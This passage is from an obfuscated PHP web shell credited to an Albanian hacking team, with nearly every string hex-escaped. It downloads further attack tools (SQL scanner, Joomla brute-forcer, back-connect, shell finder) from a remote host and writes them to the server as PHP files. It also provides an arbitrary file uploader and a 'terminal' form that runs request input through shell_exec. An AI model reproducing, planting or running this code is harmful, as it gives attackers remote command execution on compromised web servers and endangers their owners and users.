
\x3c\x63\x65\x6et\x65\x72>\x3ch3><f\x6fnt\x20color\x3d\"whi\x74\x65\x22>Don\x65\x20S\x68\x65l\x6c \x4ea\x6de <a\x20\x68r\x65\x66\x3d\x22c\x70\x2ep\x68\x70\x22><f\x6f\x6et c\x6f\x6cor\x3d\x72ed>\x63p.ph\x70</\x66\x6f\x6e\x74\x3e</\x61> </h1\x3e ";}if($_GET[a]=="\x73\x71l"){$iayaadkd="\x62";${"\x47LOBALS"}["\x62ct\x64\x75\x61\x69s\x77"]="\x62";${${"\x47\x4cO\x42\x41\x4cS"}["\x61\x66k\x68\x6e\x62\x7a\x6d\x6e\x6d"]}=file_get_contents("\x68\x74\x74p://f\x74\x70\x2e\x6aaist\x2ea\x63.j\x70/p\x75\x62//\x73\x6fur\x63\x65fo\x72\x67e/\x70/p\x72/p\x72o\x63\x6f\x64e\x72z/\x73\x71\x6c\x73c\x61\x6e\x2e\x74xt");${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x62\x63td\x75\x61i\x73\x77"]}=fopen("s\x71lsc\x61\x6e.p\x68\x70","\x77");fwrite(${${"\x47\x4cO\x42A\x4c\x53"}["\x6el\x64jqv\x70e\x61"]},${${"G\x4c\x4f\x42\x41\x4cS"}["a\x66\x6b\x68\x6eb\x7a\x6d\x6e\x6d"]});fclose(${$iayaadkd});print"<br\x3e<\x63\x65n\x74\x65\x72\x3e<\x683\x3e\x3c\x66\x6f\x6et c\x6flor\x3d\x22wh\x69\x74e\x22>\x44one \x53\x68\x65\x6cl\x20N\x61\x6d\x65 \x3ca href\x3d\"\x73q\x6cs\x63\x61n.p\x68\x70\x22>\x3c\x66\x6f\x6e\x74 \x63\x6f\x6cor=r\x65\x64>sq\x6c\x73can.\x70\x68\x70\x3c/font></a>\x20 ";}if($_GET[a]=="j\x62"){${"\x47LO\x42\x41\x4cS"}["\x70\x67\x6ec\x68e\x74\x62\x71k"]="\x62";${${"GL\x4fBA\x4c\x53"}["\x61\x66k\x68\x6e\x62\x7a\x6dn\x6d"]}=file_get_contents("h\x74\x74p://ft\x70.j\x61is\x74.\x61\x63.\x6ap/pu\x62//s\x6fu\x72c\x65f\x6frg\x65/\x70/p\x72/\x70r\x6f\x63\x6fd\x65\x72\x7a/\x6a\x6foml\x61\x62\x72\x75\x74e\x2etx\x74");${${"\x47LO\x42\x41\x4c\x53"}["pg\x6e\x63h\x65\x74bq\x6b"]}=fopen("j\x62.php","w");fwrite(${${"G\x4cOB\x41L\x53"}["\x6e\x6c\x64\x6a\x71v\x70e\x61"]},${${"GL\x4f\x42A\x4c\x53"}["a\x66\x6bh\x6eb\x7am\x6e\x6d"]});fclose(${${"GL\x4fB\x41\x4cS"}["\x6el\x64j\x71\x76\x70\x65a"]});print"<\x62\x72\x3e\x3cce\x6et\x65r><\x683>\x3cf\x6fn\x74\x20c\x6f\x6co\x72\x3d\"w\x68i\x74\x65\"\x3e\x44\x6f\x6ee \x53hel\x6c \x4ea\x6de\x20\x3c\x61 \x68\x72\x65f\x3d\x22\x6ab.\x70hp\x22\x3e<\x66\x6f\x6e\x74\x20c\x6f\x6c\x6fr\x3d\x72\x65d>\x6a\x62\x2ep\x68\x70\x3c/f\x6fnt\x3e\x3c/a\x3e </\x68\x31\x3e ";}if($_GET[a]=="\x624\x63k"){$myaorjzhay="fi\x6ce";${$myaorjzhay}=file_get_contents("\x68\x74tp://\x66tp\x2e\x6aa\x69s\x74\x2e\x61\x63.\x6a\x70/p\x75\x62//s\x6f\x75rce\x66org\x65/p/p\x72/p\x72\x6f\x63\x6f\x64\x65rz/b\x34\x63k\x2et\x78t");${"\x47\x4c\x4f\x42\x41\x4cS"}["u\x61\x77s\x66\x79x\x77\x71\x65\x6c"]="\x62";${${"G\x4cO\x42AL\x53"}["u\x61w\x73\x66yx\x77\x71\x65l"]}=fopen("\x624c\x6b\x2e\x70\x68\x70","\x77");fwrite(${${"G\x4cO\x42\x41LS"}["nld\x6aq\x76\x70\x65\x61"]},${${"\x47\x4c\x4fBA\x4c\x53"}["\x61\x66\x6bh\x6e\x62zm\x6em"]});fclose(${${"\x47\x4cOBAL\x53"}["\x6e\x6c\x64j\x71v\x70e\x61"]});print"<\x62\x72><\x63\x65nte\x72\x3e\x3c\x68\x33><\x66o\x6et\x20c\x6f\x6co\x72\x3d\"\x77\x68i\x74\x65\x22\x3e\x44\x6fne\x20\x53hel\x6c \x4eam\x65\x20\x3c\x61 h\x72\x65\x66=\"\x62\x34ck\x2ep\x68p\"><f\x6fnt\x20\x63o\x6c\x6fr\x3d\x72e\x64>b\x34\x63k.p\x68p</\x66\x6fn\x74\x3e</\x61> \x20";}if($_GET[a]=="j\x73\x73"){$urinanwuzjb="b";${"\x47\x4c\x4f\x42A\x4cS"}["\x62\x63i\x71\x6c\x68w\x6a\x69p"]="\x62";${${"\x47\x4c\x4fBA\x4c\x53"}["\x61\x66k\x68\x6e\x62\x7am\x6e\x6d"]}=file_get_contents("h\x74tp://ft\x70\x2e\x6aai\x73\x74\x2eac.jp/\x70ub//\x73o\x75r\x63\x65\x66\x6fr\x67\x65/p/pr/\x70roc\x6f\x64er\x7a/j\x73\x73\x2e\x74\x78t");${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["n\x6c\x64\x6a\x71\x76p\x65\x61"]}=fopen("js\x73.\x70hp","\x77");fwrite(${${"\x47LO\x42\x41L\x53"}["\x62ci\x71\x6ch\x77\x6a\x69p"]},${${"G\x4cOBA\x4c\x53"}["\x61f\x6bh\x6e\x62\x7a\x6d\x6e\x6d"]});fclose(${$urinanwuzjb});print"<br\x3e\x3cce\x6e\x74\x65\x72\x3e

\x3c\x66\x6f\x6e\x74\x20c\x6flo\x72\x3d\x22w\x68\x69\x74e\x22\x3e\x44\x6fn\x65 She\x6cl \x4eam\x65\x20<\x61 href=\x22jss.p\x68\x70\x22><fo\x6e\x74 \x63\x6f\x6cor\x3d\x72\x65\x64>\x6as\x73\x2e\x70hp</\x66on\x74></\x61>\x20\x3c/h\x31\x3e\x20";}if($_GET[a]=="\x77s\x73"){$murjrsedclss="\x62";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x61\x66\x6b\x68\x6e\x62z\x6d\x6em"]}=file_get_contents("\x68\x74\x74\x70://\x66tp\x2eja\x69\x73\x74.\x61c.\x6a\x70/pub//\x73\x6f\x75\x72\x63efor\x67\x65/\x70/p\x72/p\x72ocod\x65\x72z/w\x73\x73.t\x78\x74");${$murjrsedclss}=fopen("\x77\x73\x73\x2ephp","\x77");fwrite(${${"GLO\x42\x41L\x53"}["\x6e\x6cd\x6a\x71\x76\x70\x65\x61"]},${${"G\x4cO\x42AL\x53"}["a\x66\x6bh\x6eb\x7a\x6dn\x6d"]});fclose(${${"G\x4c\x4f\x42\x41\x4cS"}["nl\x64\x6a\x71v\x70ea"]});print"\x3c\x62\x72\x3e\x3ccen\x74e\x72>\x3c\x683><\x66\x6fn\x74\x20co\x6c\x6f\x72=\x22w\x68\x69\x74\x65\">\x44o\x6e\x65\x20She\x6c\x6c\x20\x4ea\x6d\x65\x20<a\x20\x68\x72\x65f=\x22\x77ss\x2e\x70\x68\x70\x22\x3e<\x66\x6f\x6e\x74 c\x6f\x6c\x6fr\x3dr\x65d>wss.ph\x70</\x66\x6f\x6e\x74>\x3c/\x61> </\x68\x31\x3e ";}if($_GET[a]=="a\x64\x6d"){$nktjugsci="\x62";${"GL\x4f\x42\x41\x4c\x53"}["\x66ko\x6c\x76\x79\x68"]="\x66\x69\x6c\x65";${${"\x47\x4c\x4f\x42ALS"}["\x66k\x6f\x6cv\x79h"]}=file_get_contents("\x68tt\x70://ftp\x2e\x6aa\x69st\x2eac.j\x70/pub//\x73ou\x72c\x65f\x6fr\x67e/p/\x70\x72/\x70\x72oc\x6fd\x65\x72\x7a/adm\x2e\x74\x78\x74");${$nktjugsci}=fopen("adm.\x70h\x70","w");fwrite(${${"G\x4c\x4f\x42\x41L\x53"}["\x6e\x6cdj\x71v\x70\x65a"]},${${"G\x4c\x4fBALS"}["\x61\x66\x6bh\x6e\x62\x7a\x6dn\x6d"]});fclose(${${"\x47\x4cO\x42\x41\x4c\x53"}["n\x6cdj\x71v\x70e\x61"]});print"<\x62\x72\x3e<\x63\x65\x6ete\x72>\x3ch3><\x66\x6f\x6et \x63\x6flo\x72=\"white\"\x3e\x44one Shel\x6c\x20\x4e\x61\x6d\x65\x20<a \x68r\x65f\x3d\"a\x64m.\x70hp\x22>\x3cfon\x74\x20c\x6f\x6c\x6f\x72=\x72\x65\x64>\x61d\x6d\x2e\x70\x68\x70</\x66o\x6et></a> \x3c/h1> ";}if($_GET[a]=="\x734s"){$ybsgfgdh="\x62";${"\x47\x4c\x4f\x42\x41LS"}["\x67\x63ltj\x79\x79\x79w\x73\x62\x6a"]="\x62";${"\x47L\x4f\x42\x41LS"}["\x67\x64y\x74\x68\x6e\x67\x62q\x79\x64"]="\x66\x69\x6c\x65";${${"\x47\x4c\x4f\x42AL\x53"}["\x61\x66kh\x6e\x62\x7a\x6d\x6em"]}=file_get_contents("\x68ttp://f\x74p\x2e\x6a\x61\x69s\x74\x2e\x61\x63.jp/pub//so\x75rc\x65\x66\x6fr\x67e/\x70/pr/\x70\x72oc\x6f\x64erz/s\x68\x65\x6c\x6cfin\x64\x65r.t\x78\x74");${$ybsgfgdh}=fopen("sh\x65l\x6cf\x69\x6e\x64\x65\x72.ph\x70","\x77");fwrite(${${"\x47LO\x42\x41\x4c\x53"}["\x67\x63\x6c\x74jyy\x79\x77\x73\x62j"]},${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x67\x64\x79\x74h\x6e\x67bq\x79\x64"]});fclose(${${"\x47LO\x42\x41L\x53"}["\x6e\x6cdj\x71vp\x65\x61"]});print"\x3cb\x72><\x63ente\x72\x3e\x3c\x68\x33\x3e\x3c\x66on\x74\x20colo\x72=\"\x77hi\x74e\"\x3eDone\x20Sh\x65\x6cl Name <\x61 h\x72\x65\x66=\x22sh\x65\x6cl\x66\x69\x6e\x64e\x72.\x70hp\"\x3e\x3c\x66on\x74\x20c\x6f\x6c\x6fr\x3dre\x64\x3e\x73hel\x6cf\x69n\x64\x65\x72.php</fo\x6e\x74></\x61\x3e\x20</h\x31\x3e\x20";}echo"<\x66ont\x20fac\x65=\"\x56\x65rd\x61na\" si\x7a\x65\x3d\"\x32\x22>\n\n\x3c\x63e\x6e\x74er>Uname-a :\x20<fo\x6et\x20\x63o\x6co\x72=\x22#\x3808\x30\x38\x30\x22\x3e".Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64."\n\x3cbr\x3e<b\x72\x3e\n";echo"\n\x3ct\x61ble\x20\x62\x6f\x72\x64e\x72=1 \x62\x6f\x72\x64erc\x6fl\x6fr=\x72\x65\x64>\n\x3ct\x64 w\x69\x64th\x3d\x35\x350\x20h\x65\x69\x67h\x74\x3d28\x3e<cent\x65\x72\x3e\n\x3cf\x6fnt\x20fa\x63\x65\x3d\x22Verda\x6ea\x22 \x73i\x7ae=\x221\x22\x20\x66on\x74\x20co\x6cor=r\x65\x64>\x2e/\x75\x70l\x6fa\x64\x65r\x3c/\x66ont></\x63ent\x65\x72><\x62\x72>";echo"\x3ccent\x65\x72>\x3cfo\x72\x6d\x20a\x63\x74i\x6f\x6e\x3d\x22\" met\x68\x6fd\x3d\x22p\x6f\x73\x74\" e\x6ectype\x3d\x22mu\x6c\x74\x69p\x61rt/\x66\x6f\x72\x6d-\x64a\x74a\"\x20n\x61me\x3d\"\x75p\x6c\x6f\x61d\x65\x72\"\x20\x69d=\"u\x70\x6c\x6fade\x72\x22\x3e";$glkfnrf="cmd";echo"\x3c\x63\x65\x6et\x65\x72>\x3c\x69\x6ep\x75t\x20\x74y\x70e\x3d\x22f\x69le\x22\x20na\x6de\x3d\x22\x66ile\"\x20siz\x65\x3d\x22\x350\x22>\x3cin\x70\x75t\x20\x6e\x61m\x65=\x22\x5f\x75p\x6c\x22\x20ty\x70\x65=\x22su\x62\x6d\x69t\x22\x20id\x3d\x22_\x75p\x6c\" v\x61\x6cue=\"Up\x6c\x6fa\x64\"></fo\x72\x6d\x3e\x3c/cen\x74\x65\x72>";if($_POST["_upl"]=="\x55\x70\x6c\x6fad"){if(@copy($_FILES["f\x69l\x65"]["\x74\x6dp_\x6e\x61\x6de"],$_FILES["f\x69\x6c\x65"]["n\x61\x6de"])){echo"<p\x20\x61\x6ci\x67n\x3d\"ce\x6e\x74er\"\x3e<fon\x74 \x66a\x63\x65=\x22Verd\x61\x6ea\"\x20s\x69z\x65\x3d\"\x31\"\x3e\x3c\x66\x6f\x6e\x74\x20\x63\x6fl\x6fr=\x22\x77hit\x65\"> OK :)\x3c/\x66\x6fnt><\x62\x72>";}else{echo"\x3c\x66o\x6et\x20c\x6f\x6cor=\"\x23\x46\x46\x30\x30\x300\"\x3eFai\x6ce\x64 :( \x3c/\x66\x6f\x6e\x74\x3e\x3c/\x70\x3e\n\t\x3c/t\x64\x3e</\x74\x61b\x6c\x65\x3e\n";}}echo "\n\x3c/b\x6fdy>\n<\x68\x72 c\x6f\x6c\x6fr\x3d\x22\x72e\x64\">\n\x3c/\x68tm\x6c>\n\x3c\x74a\x62le b\x6f\x72\x64e\x72\x3d\x31 \x62\x6f\x72\x64e\x72\x63o\x6c\x6f\x72=re\x64>\n<\x74\x64\x20w\x69d\x74\x68=\x355\x30\x20\x68\x65\x69\x67\x68t=2\x38\x3e\n\x3c\x68\x74\x6d\x6c> \n<\x62od\x79 \x74\x65xt=red>\x20\x3c\x63\x65nter>\x3cfont\x20\x73\x69z\x65=1 fon\x74 \x63o\x6c\x6f\x72\x3d\x72\x65\x64\x3e./\x74\x65\x72\x6dinal</\x66o\x6e\x74\x3e\x3c/c\x65\x6e\x74\x65\x72>\n<\x66\x6frm m\x65th\x6fd\x3d\x50OS\x54\x3e\x3c\x70r\x65\x3e[\x70\x72o@";echo$_SERVER["\x53ERVER_\x4eA\x4dE"];echo "\x20~]\x20\x23 <\x69\x6e\x70\x75\x74 \x74\x79\x70\x65=\x54E\x58\x54\x20na\x6de=\x22-\x63\x6dd\" s\x69\x7a\x65\x3d6\x34\x20va\x6c\x75\x65\x3d\x22";${"\x47LO\x42A\x4c\x53"}["\x74\x72\x67\x78q\x69\x62"]="\x63\x6d\x64";echo ${${"\x47\x4c\x4f\x42\x41L\x53"}["t\x72\x67\x78\x71\x69\x62"]};echo "\" \n\x73\x74\x79le\x3d\"f\x6fn\x74-\x66a\x6d\x69ly:\x20Co\x75ri\x65r\x20New;\"\x3e\x20\n\x3c/center>\n";${${"G\x4c\x4f\x42\x41L\x53"}["\x74r\x67\x78\x71\x69b"]}=$_REQUEST["-c\x6d\x64"];echo "\x20\n";if(${${"G\x4cOB\x41\x4c\x53"}["\x74\x72\x67xq\x69\x62"]}!="")print Shell_Exec(${$glkfnrf});echo "\n[<sy\x3e\x3ca\x20\x68\x72ef=\"\x23t\x6f\x70\"\x3eT\x4f\x50</a\x3e\x3c/\x73y>]\n\x3c/p\x72e\x3e\x3c\x68r\x20colo\x72=\"\x72\x65d\x22\x3e<cent\x65\x72><\x66\x6f\x6e\x74\x20\x73iz\x65\x3d1>\nCode\x64\x20by \x3ca\x20hr\x65f\x3d\x22ht\x74p://www\x2e\x66a\x63eboo\x6b.co\x6d/r\x6f\x6ft\x2epro\x63o\x64e\x72\x7a\">R\x65t\x6e\x4f\x48a\x63\x4b</a\x3e \x23\x50\x72\x6fco\x64\x65\x72\x7a T\x65am\x20\x41lba\x6e\x69\x61n\x3c\x62\x72>\x3c\x61\x20\x68\x72\x65\x66\x3d\"\x68\x74tp://w\x77\x77.\x70r\x6f\x63\x6fd\x65rz\x2eco\x6d\">\x77w\x77.\x70ro\x63oder\x7a\x2ecom\x3c/\x61\x3e</ta\x62le>\x3c/\x68\x74ml\x3e";